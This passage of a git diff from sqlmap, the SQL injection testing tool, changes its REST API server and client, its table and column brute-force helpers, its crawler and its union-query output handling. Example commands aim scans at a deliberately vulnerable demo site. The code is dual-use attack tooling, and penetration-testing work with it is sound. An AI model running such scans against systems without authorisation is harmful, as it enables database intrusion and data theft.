re.sub(r"[^A-Za-z0-9]", "", item).lower() - if key not in filtered or re.search(r"[^A-Za-z0-9]", item): - filtered[key] = item - items = filtered.values() - items = [items] - index = None - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, items)) - else: - index = None - if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, None)) + if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta: + _ = ','.join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items + status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_)) - items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) + if len(status) > width: + status = "%s..." % status[:width - 3] - while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): - threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] - if not isNoneValue(_): - threadData.shared.value.extend(arrayizeValue(_)) - del threadData.shared.buffered[0] + dataToStdout("%s\n" % status) - if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta: - status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items)) + runThreads(numThreads, unionThread) - if len(status) > width: - status = "%s..." % status[:width - 3] + if conf.verbose == 1: + clearConsoleLine(True) - dataToStdout("%s\n" % status, True) + except KeyboardInterrupt: + abortedFlag = True - runThreads(numThreads, unionThread) + warnMsg = "user aborted during enumeration. sqlmap " + warnMsg += "will display partial output" + logger.warn(warnMsg) - if conf.verbose == 1: - clearConsoleLine(True) - - except KeyboardInterrupt: - abortedFlag = True - - warnMsg = "user aborted during enumeration. 
sqlmap " - warnMsg += "will display partial output" - logger.warn(warnMsg) - - finally: - for _ in sorted(threadData.shared.buffered): - if not isNoneValue(_[1]): - threadData.shared.value.extend(arrayizeValue(_[1])) - value = threadData.shared.value - kb.suppressResumeInfo = False + finally: + for _ in sorted(threadData.shared.buffered): + if not isNoneValue(_[1]): + threadData.shared.value.extend(arrayizeValue(_[1])) + value = threadData.shared.value + kb.suppressResumeInfo = False if not value and not abortedFlag: output = _oneShotUnionUse(expression, unpack) diff --git a/lib/utils/__init__.py b/lib/utils/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/utils/__init__.py +++ b/lib/utils/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/utils/api.py b/lib/utils/api.py index c007289b5..9c41412c8 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -2,21 +2,26 @@ # -*- coding: utf-8 -*- """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import contextlib import logging import os +import re +import shlex +import socket import sqlite3 import sys import tempfile import time +import urllib2 -from subprocess import PIPE - +from lib.core.common import dataToStdout +from lib.core.common import getSafeExString +from lib.core.common import saveConfig from lib.core.common import unArrayizeValue -from lib.core.convert import base64pickle from lib.core.convert import hexencode from lib.core.convert import dejsonize from lib.core.convert import jsonize @@ -27,12 +32,17 @@ from lib.core.data import logger from lib.core.datatype import AttribDict from lib.core.defaults import _defaults from lib.core.enums import CONTENT_STATUS +from lib.core.enums import MKSTEMP_PREFIX from lib.core.enums import PART_RUN_CONTENT_TYPES from lib.core.exception import SqlmapConnectionException from lib.core.log import LOGGER_HANDLER from lib.core.optiondict import optDict +from lib.core.settings import RESTAPI_DEFAULT_ADAPTER from lib.core.settings import IS_WIN +from lib.core.settings import RESTAPI_DEFAULT_ADDRESS +from lib.core.settings import RESTAPI_DEFAULT_PORT from lib.core.subprocessng import Popen +from lib.parse.cmdline import cmdLineParser from thirdparty.bottle.bottle import error as return_error from thirdparty.bottle.bottle import get from thirdparty.bottle.bottle import hook @@ -40,9 +50,7 @@ from thirdparty.bottle.bottle import post from thirdparty.bottle.bottle import request from thirdparty.bottle.bottle import response from thirdparty.bottle.bottle import run - -RESTAPI_SERVER_HOST = "127.0.0.1" -RESTAPI_SERVER_PORT = 8775 +from thirdparty.bottle.bottle import server_names # global settings @@ -62,7 +70,7 @@ class Database(object): self.cursor = None def connect(self, who="server"): - self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None) + self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None, check_same_thread=False) self.cursor = self.connection.cursor() logger.debug("REST-JSON API %s connected to IPC database" % who) @@ -84,7 +92,7 @@ class Database(object): else: self.cursor.execute(statement) except sqlite3.OperationalError, ex: - if not "locked" in ex.message: + if not "locked" in getSafeExString(ex): 
raise else: break @@ -112,7 +120,8 @@ class Database(object): class Task(object): - def __init__(self, taskid): + def __init__(self, taskid, remote_addr): + self.remote_addr = remote_addr self.process = None self.output_directory = None self.options = None @@ -154,12 +163,21 @@ class Task(object): self.options = AttribDict(self._original_options) def engine_start(self): - self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)], - shell=False, stdin=PIPE, close_fds=not IS_WIN) + handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True) + os.close(handle) + saveConfig(self.options, configFile) + + if os.path.exists("sqlmap.py"): + self.process = Popen(["python", "sqlmap.py", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN) + elif os.path.exists(os.path.join(os.getcwd(), "sqlmap.py")): + self.process = Popen(["python", "sqlmap.py", "--api", "-c", configFile], shell=False, cwd=os.getcwd(), close_fds=not IS_WIN) + else: + self.process = Popen(["sqlmap", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN) def engine_stop(self): if self.process: - return self.process.terminate() + self.process.terminate() + return self.process.wait() else: return None @@ -168,9 +186,12 @@ class Task(object): def engine_kill(self): if self.process: - return self.process.kill() - else: - return None + try: + self.process.kill() + return self.process.wait() + except: + pass + return None def engine_get_id(self): if self.process: @@ -211,34 +232,26 @@ class StdDbOut(object): # Ignore all non-relevant messages return - output = conf.database_cursor.execute( - "SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", - (self.taskid, content_type)) + output = conf.databaseCursor.execute("SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", (self.taskid, content_type)) # Delete partial output from IPC database if we have got a complete output if status == CONTENT_STATUS.COMPLETE: if len(output) > 0: for index in xrange(len(output)): - conf.database_cursor.execute("DELETE FROM data WHERE id = ?", - (output[index][0],)) + conf.databaseCursor.execute("DELETE FROM data WHERE id = ?", (output[index][0],)) - conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", - (self.taskid, status, content_type, jsonize(value))) + conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) if kb.partRun: kb.partRun = None elif status == CONTENT_STATUS.IN_PROGRESS: if len(output) == 0: - conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", - (self.taskid, status, content_type, - jsonize(value))) + conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) else: new_value = "%s%s" % (dejsonize(output[0][2]), value) - conf.database_cursor.execute("UPDATE data SET value = ? WHERE id = ?", - (jsonize(new_value), output[0][0])) + conf.databaseCursor.execute("UPDATE data SET value = ? 
WHERE id = ?", (jsonize(new_value), output[0][0])) else: - conf.database_cursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", - (self.taskid, str(value) if value else "")) + conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", (self.taskid, str(value) if value else "")) def flush(self): pass @@ -249,23 +262,19 @@ class StdDbOut(object): def seek(self): pass - class LogRecorder(logging.StreamHandler): def emit(self, record): """ Record emitted events to IPC database for asynchronous I/O communication with the parent process """ - conf.database_cursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", - (conf.taskid, time.strftime("%X"), record.levelname, - record.msg % record.args if record.args else record.msg)) - + conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", (conf.taskid, time.strftime("%X"), record.levelname, record.msg % record.args if record.args else record.msg)) def setRestAPILog(): - if hasattr(conf, "api"): + if conf.api: try: - conf.database_cursor = Database(conf.database) - conf.database_cursor.connect("client") + conf.databaseCursor = Database(conf.database) + conf.databaseCursor.connect("client") except sqlite3.OperationalError, ex: raise SqlmapConnectionException, "%s ('%s')" % (ex, conf.database) @@ -335,7 +344,9 @@ def task_new(): Create new task ID """ taskid = hexencode(os.urandom(8)) - DataStore.tasks[taskid] = Task(taskid) + remote_addr = request.remote_addr + + DataStore.tasks[taskid] = Task(taskid, remote_addr) logger.debug("Created new task: '%s'" % taskid) return jsonize({"success": True, "taskid": taskid}) @@ -361,31 +372,32 @@ def task_delete(taskid): @get("/admin/<taskid>/list") -def task_list(taskid): +def task_list(taskid=None): """ List task pull """ - if is_admin(taskid): - logger.debug("[%s] Listed task pool" % taskid) - tasks = list(DataStore.tasks) - return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) - else: - logger.warning("[%s] Unauthorized call to task_list()" % taskid) - return jsonize({"success": False, "message": "Unauthorized"}) + tasks = {} + for key in DataStore.tasks: + if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr: + tasks[key] = dejsonize(scan_status(key))["status"] + + logger.debug("[%s] Listed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) + return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) @get("/admin/<taskid>/flush") def task_flush(taskid): """ Flush task spool (delete all tasks) """ - if is_admin(taskid): - DataStore.tasks = dict() - logger.debug("[%s] Flushed task pool" % taskid) - return jsonize({"success": True}) - else: - logger.warning("[%s] Unauthorized call to task_flush()" % taskid) - return jsonize({"success": False, "message": "Unauthorized"}) + + for key in list(DataStore.tasks): + if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr: + DataStore.tasks[key].engine_kill() + del DataStore.tasks[key] + + logger.debug("[%s] Flushed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) + return jsonize({"success": True}) ################################## # sqlmap core interact functions # @@ -467,7 +479,9 @@ def scan_stop(taskid): """ Stop a scan """ - if taskid not in DataStore.tasks: + if (taskid not in DataStore.tasks or + DataStore.tasks[taskid].engine_process() is None or + DataStore.tasks[taskid].engine_has_terminated()): logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid) return 
jsonize({"success": False, "message": "Invalid task ID"}) @@ -482,7 +496,9 @@ def scan_kill(taskid): """ Kill a scan """ - if taskid not in DataStore.tasks: + if (taskid not in DataStore.tasks or + DataStore.tasks[taskid].engine_process() is None or + DataStore.tasks[taskid].engine_has_terminated()): logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) @@ -527,16 +543,11 @@ def scan_data(taskid): return jsonize({"success": False, "message": "Invalid task ID"}) # Read all data from the IPC database for the taskid - for status, content_type, value in DataStore.current_db.execute( - "SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", - (taskid,)): - json_data_message.append( - {"status": status, "type": content_type, "value": dejsonize(value)}) + for status, content_type, value in DataStore.current_db.execute("SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", (taskid,)): + json_data_message.append({"status": status, "type": content_type, "value": dejsonize(value)}) # Read all error messages from the IPC database - for error in DataStore.current_db.execute( - "SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", - (taskid,)): + for error in DataStore.current_db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_errors_message.append(error) logger.debug("[%s] Retrieved scan data and error messages" % taskid) @@ -552,7 +563,7 @@ def scan_log_limited(taskid, start, end): json_log_messages = list() if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_log_limited()") + logger.warning("[%s] Invalid task ID provided to scan_log_limited()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) if not start.isdigit() or not end.isdigit() or end < start: @@ -563,10 +574,7 @@ def scan_log_limited(taskid, start, end): end = max(1, int(end)) # Read a subset of log messages from the IPC database - for time_, level, message in DataStore.current_db.execute( - ("SELECT time, level, message FROM logs WHERE " - "taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC"), - (taskid, start, end)): + for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)): json_log_messages.append({"time": time_, "level": level, "message": message}) logger.debug("[%s] Retrieved scan log messages subset" % taskid) @@ -581,12 +589,11 @@ def scan_log(taskid): json_log_messages = list() if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_log()") + logger.warning("[%s] Invalid task ID provided to scan_log()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) # Read all log messages from the IPC database - for time_, level, message in DataStore.current_db.execute( - "SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)): + for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? 
ORDER BY id ASC", (taskid,)): json_log_messages.append({"time": time_, "level": level, "message": message}) logger.debug("[%s] Retrieved scan log messages" % taskid) @@ -603,14 +610,13 @@ def download(taskid, target, filename): logger.warning("[%s] Invalid task ID provided to download()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) - # Prevent file path traversal - the lame way - if ".." in target: + path = os.path.abspath(os.path.join(paths.SQLMAP_OUTPUT_PATH, target, filename)) + # Prevent file path traversal + if not path.startswith(paths.SQLMAP_OUTPUT_PATH): logger.warning("[%s] Forbidden path (%s)" % (taskid, target)) return jsonize({"success": False, "message": "Forbidden path"}) - path = os.path.join(paths.SQLMAP_OUTPUT_PATH, target) - - if os.path.exists(path): + if os.path.isfile(path): logger.debug("[%s] Retrieved content of file %s" % (taskid, target)) with open(path, 'rb') as inf: file_content = inf.read() @@ -620,16 +626,22 @@ def download(taskid, target, filename): return jsonize({"success": False, "message": "File does not exist"}) -def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): +def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER): """ REST-JSON API server """ DataStore.admin_id = hexencode(os.urandom(16)) - Database.filepath = tempfile.mkstemp(prefix="sqlmapipc-", text=False)[1] + handle, Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False) + os.close(handle) + + if port == 0: # random + with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s: + s.bind((host, 0)) + port = s.getsockname()[1] logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port)) logger.info("Admin ID: %s" % DataStore.admin_id) - logger.debug("IPC database: %s" % Database.filepath) + logger.debug("IPC database: '%s'" % Database.filepath) # Initialize IPC database DataStore.current_db = Database() @@ -637,21 +649,187 @@ def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): DataStore.current_db.init() # Run RESTful API - run(host=host, port=port, quiet=True, debug=False) + try: + # Supported adapters: aiohttp, auto, bjoern, cgi, cherrypy, diesel, eventlet, fapws3, flup, gae, gevent, geventSocketIO, gunicorn, meinheld, paste, rocket, tornado, twisted, waitress, wsgiref + # Reference: https://bottlepy.org/docs/dev/deployment.html || bottle.server_names + + if adapter == "gevent": + from gevent import monkey + monkey.patch_all() + elif adapter == "eventlet": + import eventlet + eventlet.monkey_patch() + logger.debug("Using adapter '%s' to run bottle" % adapter) + run(host=host, port=port, quiet=True, debug=False, server=adapter) + except socket.error, ex: + if "already in use" in getSafeExString(ex): + logger.error("Address already in use ('%s:%s')" % (host, port)) + else: + raise + except ImportError: + if adapter.lower() not in server_names: + errMsg = "Adapter '%s' is unknown. 
" % adapter + errMsg += "(Note: available adapters '%s')" % ', '.join(sorted(server_names.keys())) + else: + errMsg = "Server support for adapter '%s' is not installed on this system " % adapter + errMsg += "(Note: you can try to install it with 'sudo apt-get install python-%s' or 'sudo pip install %s')" % (adapter, adapter) + logger.critical(errMsg) + +def _client(url, options=None): + logger.debug("Calling %s" % url) + try: + data = None + if options is not None: + data = jsonize(options) + req = urllib2.Request(url, data, {"Content-Type": "application/json"}) + response = urllib2.urlopen(req) + text = response.read() + except: + if options: + logger.error("Failed to load and parse %s" % url) + raise + return text -def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): +def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT): """ REST-JSON API client """ + + dbgMsg = "Example client access from command line:" + dbgMsg += "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port) + dbgMsg += "\n\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/$taskid/start" % (host, port) + dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/data" % (host, port) + dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/log" % (host, port) + logger.debug(dbgMsg) + addr = "http://%s:%d" % (host, port) logger.info("Starting REST-JSON API client to '%s'..." % addr) - # TODO: write a simple client with requests, for now use curl from command line - logger.error("Not yet implemented, use curl from command line instead for now, for example:") - print "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port) - print ("\t$ curl -H \"Content-Type: application/json\" " - "-X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' " - "http://%s:%d/scan/$taskid/start") % (host, port) - print "\t$ curl http://%s:%d/scan/$taskid/data" % (host, port) - print "\t$ curl http://%s:%d/scan/$taskid/log\n" % (host, port) + try: + _client(addr) + except Exception, ex: + if not isinstance(ex, urllib2.HTTPError): + errMsg = "There has been a problem while connecting to the " + errMsg += "REST-JSON API server at '%s' " % addr + errMsg += "(%s)" % ex + logger.critical(errMsg) + return + + taskid = None + logger.info("Type 'help' or '?' 
for list of available commands") + + while True: + try: + command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip() + command = re.sub(r"\A(\w+)", lambda match: match.group(1).lower(), command) + except (EOFError, KeyboardInterrupt): + print + break + + if command in ("data", "log", "status", "stop", "kill"): + if not taskid: + logger.error("No task ID in use") + continue + raw = _client("%s/scan/%s/%s" % (addr, taskid, command)) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + dataToStdout("%s\n" % raw) + + elif command.startswith("option"): + if not taskid: + logger.error("No task ID in use") + continue + try: + command, option = command.split(" ") + except ValueError: + raw = _client("%s/option/%s/list" % (addr, taskid)) + else: + options = {"option": option} + raw = _client("%s/option/%s/get" % (addr, taskid), options) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + dataToStdout("%s\n" % raw) + + elif command.startswith("new"): + if ' ' not in command: + logger.error("Program arguments are missing") + continue + + try: + argv = ["sqlmap.py"] + shlex.split(command)[1:] + except Exception, ex: + logger.error("Error occurred while parsing arguments ('%s')" % ex) + taskid = None + continue + + try: + cmdLineOptions = cmdLineParser(argv).__dict__ + except: + taskid = None + continue + + for key in list(cmdLineOptions): + if cmdLineOptions[key] is None: + del cmdLineOptions[key] + + raw = _client("%s/task/new" % addr) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to create new task") + continue + taskid = res["taskid"] + logger.info("New task ID is '%s'" % taskid) + + raw = _client("%s/scan/%s/start" % (addr, taskid), cmdLineOptions) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to start scan") + continue + logger.info("Scanning started") + + elif command.startswith("use"): + taskid = (command.split()[1] if ' ' in command else "").strip("'\"") + if not taskid: + logger.error("Task ID is missing") + taskid = None + continue + elif not re.search(r"\A[0-9a-fA-F]{16}\Z", taskid): + logger.error("Invalid task ID '%s'" % taskid) + taskid = None + continue + logger.info("Switching to task ID '%s' " % taskid) + + elif command in ("list", "flush"): + raw = _client("%s/admin/%s/%s" % (addr, taskid or 0, command)) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + elif command == "flush": + taskid = None + dataToStdout("%s\n" % raw) + + elif command in ("exit", "bye", "quit", 'q'): + return + + elif command in ("help", "?"): + msg = "help Show this help message\n" + msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" + msg += "use TASKID Switch current context to different task (e.g. 
'use c04d8c5c7582efb4')\n" + msg += "data Retrieve and show data for current task\n" + msg += "log Retrieve and show log for current task\n" + msg += "status Retrieve and show status for current task\n" + msg += "option OPTION Retrieve and show option for current task\n" + msg += "options Retrieve and show all options for current task\n" + msg += "stop Stop current task\n" + msg += "kill Kill current task\n" + msg += "list Display all tasks\n" + msg += "flush Flush tasks (delete all tasks)\n" + msg += "exit Exit this client\n" + + dataToStdout(msg) + + elif command: + logger.error("Unknown command '%s'" % command) diff --git a/lib/techniques/brute/use.py b/lib/utils/brute.py similarity index 87% rename from lib/techniques/brute/use.py rename to lib/utils/brute.py index 4a1594590..2c41f4211 100644 --- a/lib/techniques/brute/use.py +++ b/lib/utils/brute.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -28,9 +28,9 @@ from lib.core.enums import HASHDB_KEYS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.settings import METADB_SUFFIX from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE +from lib.core.settings import METADB_SUFFIX from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.request import inject @@ -57,8 +57,7 @@ def tableExists(tableFile, regex=None): logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " - test = readInput(message, default="N") - kb.tableExistsChoice = test[0] in ("y", "Y") + kb.tableExistsChoice = readInput(message, default='N', boolean=True) if not kb.tableExistsChoice: return None @@ -70,15 +69,23 @@ def tableExists(tableFile, regex=None): if result: errMsg = "can't use table existence check because of detected invalid results " - errMsg += "(most probably caused by inability of the used injection " - errMsg += "to distinguish errornous results)" + errMsg += "(most likely caused by inability of the used injection " + errMsg += "to distinguish erroneous results)" raise SqlmapDataException(errMsg) - tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) + message = "which common tables (wordlist) file do you want to use?\n" + message += "[1] default '%s' (press Enter)\n" % tableFile + message += "[2] custom" + choice = readInput(message, default='1') + + if choice == '2': + message = "what's the custom common tables file location?\n" + tableFile = readInput(message) or tableFile infoMsg = "checking table existence using items from '%s'" % tableFile logger.info(infoMsg) + tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) tables.extend(_addPageTextWords()) tables = filterListValue(tables, regex) @@ -102,7 +109,7 @@ def tableExists(tableFile, regex=None): break if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - fullTableName = "%s%s%s" % (conf.db, '..' 
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) + fullTableName = "%s.%s" % (conf.db, table) else: fullTableName = table @@ -114,7 +121,7 @@ def tableExists(tableFile, regex=None): threadData.shared.value.append(table) threadData.shared.unique.add(table.lower()) - if conf.verbose in (1, 2) and not hasattr(conf, "api"): + if conf.verbose in (1, 2) and not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table)) dataToStdout(infoMsg, True) @@ -161,8 +168,7 @@ def columnExists(columnFile, regex=None): logger.warn(warnMsg) message = "are you sure you want to continue? [y/N] " - test = readInput(message, default="N") - kb.columnExistsChoice = test[0] in ("y", "Y") + kb.columnExistsChoice = readInput(message, default='N', boolean=True) if not kb.columnExistsChoice: return None @@ -178,10 +184,19 @@ def columnExists(columnFile, regex=None): if result: errMsg = "can't use column existence check because of detected invalid results " - errMsg += "(most probably caused by inability of the used injection " - errMsg += "to distinguish errornous results)" + errMsg += "(most likely caused by inability of the used injection " + errMsg += "to distinguish erroneous results)" raise SqlmapDataException(errMsg) + message = "which common columns (wordlist) file do you want to use?\n" + message += "[1] default '%s' (press Enter)\n" % columnFile + message += "[2] custom" + choice = readInput(message, default='1') + + if choice == '2': + message = "what's the custom common columns file location?\n" + columnFile = readInput(message) or columnFile + infoMsg = "checking column existence using items from '%s'" % columnFile logger.info(infoMsg) @@ -222,7 +237,7 @@ def columnExists(columnFile, regex=None): if result: threadData.shared.value.append(column) - if conf.verbose in (1, 2) and not hasattr(conf, "api"): + if conf.verbose in (1, 2) and not conf.api: clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column)) dataToStdout(infoMsg, True) diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py index be47608e1..27fc8fbdb 100644 --- a/lib/utils/crawler.py +++ b/lib/utils/crawler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -12,16 +12,21 @@ import urlparse import tempfile import time +from lib.core.common import checkSameHost from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import findPageForms +from lib.core.common import getSafeExString from lib.core.common import openFile from lib.core.common import readInput from lib.core.common import safeCSValue +from lib.core.common import urldecode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.enums import MKSTEMP_PREFIX from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapSyntaxException from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads @@ -58,12 +63,15 @@ def crawl(target): try: if current: content = Request.getPage(url=current, crawling=True, raise404=False)[0] - except SqlmapConnectionException, e: - errMsg = "connection exception detected (%s). 
skipping " % e + except SqlmapConnectionException, ex: + errMsg = "connection exception detected (%s). skipping " % getSafeExString(ex) errMsg += "URL '%s'" % current logger.critical(errMsg) - except httplib.InvalidURL, e: - errMsg = "invalid URL detected (%s). skipping " % e + except SqlmapSyntaxException: + errMsg = "invalid URL detected. skipping '%s'" % current + logger.critical(errMsg) + except httplib.InvalidURL, ex: + errMsg = "invalid URL detected (%s). skipping " % getSafeExString(ex) errMsg += "URL '%s'" % current logger.critical(errMsg) @@ -80,7 +88,7 @@ def crawl(target): tags = soup('a') if not tags: - tags = re.finditer(r'(?si)<a[^>]+href="(?P<href>[^>"]+)"', content) + tags = re.finditer(r'(?i)<a[^>]+href="(?P<href>[^>"]+)"', content) for tag in tags: href = tag.get("href") if hasattr(tag, "get") else tag.group("href") @@ -91,7 +99,7 @@ def crawl(target): url = urlparse.urljoin(current, href) # flag to know if we are dealing with the same target host - _ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (url, target))) + _ = checkSameHost(url, target) if conf.scope: if not re.search(conf.scope, url, re.I): @@ -104,6 +112,8 @@ def crawl(target): threadData.shared.deeper.add(url) if re.search(r"(.*?)\?(.+)", url): threadData.shared.value.add(url) + except ValueError: # for non-valid links + pass except UnicodeEncodeError: # for non-HTML files pass finally: @@ -121,22 +131,28 @@ def crawl(target): if not conf.sitemapUrl: message = "do you want to check for the existence of " message += "site's sitemap(.xml) [y/N] " - test = readInput(message, default="n") - if test[0] in ("y", "Y"): + + if readInput(message, default='N', boolean=True): + found = True items = None url = urlparse.urljoin(target, "/sitemap.xml") try: items = parseSitemap(url) + except SqlmapConnectionException, ex: + if "page not found" in getSafeExString(ex): + found = False + logger.warn("'sitemap.xml' not found") except: pass finally: - if items: - for item in items: - if re.search(r"(.*?)\?(.+)", item): - threadData.shared.value.add(item) - if conf.crawlDepth > 1: - threadData.shared.unprocessed.update(items) - logger.info("%s links found" % ("no" if not items else len(items))) + if found: + if items: + for item in items: + if re.search(r"(.*?)\?(.+)", item): + threadData.shared.value.add(item) + if conf.crawlDepth > 1: + threadData.shared.unprocessed.update(items) + logger.info("%s links found" % ("no" if not items else len(items))) infoMsg = "starting crawler" if conf.bulkFile: @@ -172,7 +188,7 @@ def crawl(target): logger.warn(warnMsg) else: for url in threadData.shared.value: - kb.targets.add((url, None, None, None, None)) + kb.targets.add((urldecode(url, kb.pageEncoding), None, None, None, None)) storeResultsToFile(kb.targets) @@ -183,11 +199,11 @@ def storeResultsToFile(results): if kb.storeCrawlingChoice is None: message = "do you want to store crawling results to a temporary file " message += "for eventual further processing with other tools [y/N] " - test 